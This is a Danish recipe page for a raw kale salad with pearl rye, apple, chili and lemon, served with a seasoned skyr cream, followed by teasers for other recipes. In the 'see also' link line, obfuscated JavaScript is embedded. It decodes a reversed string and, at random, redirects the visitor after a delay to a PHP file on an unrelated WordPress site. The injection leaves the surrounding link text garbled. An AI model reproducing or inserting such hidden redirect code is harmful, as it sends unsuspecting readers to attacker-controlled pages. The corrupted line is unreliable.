Grønkålssalat med rugspelt, chili, hvidløg og citron

Rå grønkål er allerbedst, når det finthakkes, så det lige er til at spise. Her blandes det med stærk chili, syrlig citron og masser af rugspelt, der giver retten en solid bund. Salaten er et måltid i sig selv, men kan også fint serveres til røget fisk, en god svinekotelet eller lufttørret kød som skinke og bresaola.

Opskrift til 4 pers.

1 ½-2 dl perlerug, fx fra Skærtoft Mølle
½ l grønkål
2 æbler, gerne cox orange, udkernede og skåret i grove tern
1 rød chili, udkernet og fintsnittet
1-2 fed hvidløg, knust
1 citron, økologisk, fintskåret skal af
2 spsk rapsolie
2 æbleeddike
1 tsk honning, flydende
Salt og peber

Skyr-creme:
3-4 dl skyr, velafdryppet
2-3 spsk raps- eller olivenolie
Salt og peber
Ristet spidskommen eller spicy krydderblanding

Prøv også $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard&_thumbnail_id=4148&preview=true”>Æble-nødde-slaw

Kog perlerugen efter anvisningen på pakken, og lad den afkøle. Riv grønkålsbladene fra stokken, og skær eller klip de grove ribber på bladene fra. Hak grønkålen fint. Bland derefter den kogte perlerug med grønkål, æbler, chili, hvidløg samt citronskal. Rør, og smag salaten til med rapsolie, æbleeddike samt honning, salt og peber.
Skyr-creme: Lad skyen dryppe af i et kaffefilter, rør, og smag den til med olie, salt, peber og ristet spidskommen – eller brug den spicy.
Lad gerne salaten trække, hvis der er tid og mulighed for det inden servering. Server fx til røget fisk, en god svinekotelet eller lufttørret kød som skinke og bresaola.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere